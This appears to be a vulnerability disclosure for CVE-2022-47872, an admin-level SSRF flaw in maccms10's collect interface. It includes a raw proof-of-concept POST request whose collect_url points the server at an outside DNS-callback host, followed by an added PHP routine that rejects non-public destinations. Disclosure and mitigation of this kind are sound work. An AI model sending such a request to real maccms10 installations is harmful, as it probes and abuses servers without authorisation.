
# CVE-2022-47872

maccms10 admin+ SSRF attacks

Overview

Manufacturer's website information: https://maccms.pro

Source code download address: https://github.com/maccmspro/maccms10.git

Affected version: V2021.1000.2000

2. Vulnerability details

maccmspro/maccms10#22

Log in to the admin backend, click Collect --> Custom interface --> Interface address, and enter payload1 in the name box: http://7ca8e96e.dns.1433.eu.org.

This can cause SSRF attacks.

Vulnerability name: SSRF attacks

Vulnerability level: Medium risk

Vulnerability location: click Collect --> Custom interface --> Interface address

3. Recurring vulnerabilities and

```
POST http://192.168.52.163/admin.php/admin/collect/info.html HTTP/1.1
Host: 192.168.52.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 226
Origin: http://192.168.52.163
Connection: close
Referer: http://192.168.52.163/admin.php/admin/collect/info.html
Cookie: PHPSESSID=gn328q2i2ruajsh96qoll65ia7

collect_id=&token=8d639020c85bde89f9276381d2460046&collect_name=1111&collect_url=http%3A%2F%2F7ca8e96e.dns.1433.eu.org.&collect_param=%26q%3D1&collect_type=1&collect_mid=1&collect_opt=0&collect_filter=0&collect_filter_from=
```
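A destination check that could run on the `collect_url` value before the server requests it, as an added example that is not maccms10 code. The function names (`resolve_host`, `is_public_ip`, `vet_collect_url`) and the sample hosts are hypothetical.

```php
<?php
// Added example, not maccms10 code; all function names are hypothetical.

// Default resolver: A records plus AAAA records for a hostname.
function resolve_host(string $host): array
{
    $ips = gethostbynamel($host) ?: [];
    foreach (@dns_get_record($host, DNS_AAAA) ?: [] as $rec) {
        $ips[] = $rec['ipv6'];
    }
    return $ips;
}

// Rejects RFC 1918, loopback, link-local and other reserved ranges.
function is_public_ip(string $ip): bool
{
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    return filter_var($ip, FILTER_VALIDATE_IP, $flags) !== false;
}

// Returns host, port and the vetted IP to pin the connection to, or throws.
function vet_collect_url(string $url, ?callable $resolver = null): array
{
    $p = parse_url($url);
    $scheme = strtolower($p['scheme'] ?? '');
    if (!in_array($scheme, ['http', 'https'], true) || empty($p['host'])) {
        throw new InvalidArgumentException('only http(s) URLs with a host are accepted');
    }
    $host = rtrim(trim($p['host'], '[]'), '.');   // IPv6 brackets, trailing root dot
    $isLiteral = filter_var($host, FILTER_VALIDATE_IP) !== false;
    $ips = $isLiteral ? [$host] : ($resolver ?? 'resolve_host')($host);
    if ($ips === []) throw new InvalidArgumentException('host does not resolve');
    foreach ($ips as $ip) {                        // every answer must be public
        if (!is_public_ip($ip)) throw new InvalidArgumentException("destination $ip is not public");
    }
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    // Pin with CURLOPT_RESOLVE => ["$host:$port:{$ips[0]}"] and disable redirects,
    // so the fetch cannot be re-pointed after this check (DNS rebinding, 3xx).
    return ['host' => $host, 'port' => $port, 'ip' => $ips[0]];
}

// Constructed inputs; the stub resolver stands in for DNS so the demo runs offline.
$stub = fn(string $h): array => $h === 'intranet.example' ? ['10.0.0.5'] : ['203.0.113.10'];
foreach (['http://intranet.example/x', 'http://127.0.0.1/', 'ftp://feed.example/x', 'https://feed.example/api'] as $u) {
    try { $r = 'pin to ' . vet_collect_url($u, $stub)['ip']; }
    catch (InvalidArgumentException $e) { $r = 'rejected: ' . $e->getMessage(); }
    echo "$u => $r\n";
}
```

Checking the resolved addresses rather than the hostname string is what catches a public-looking name that points at an internal address.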
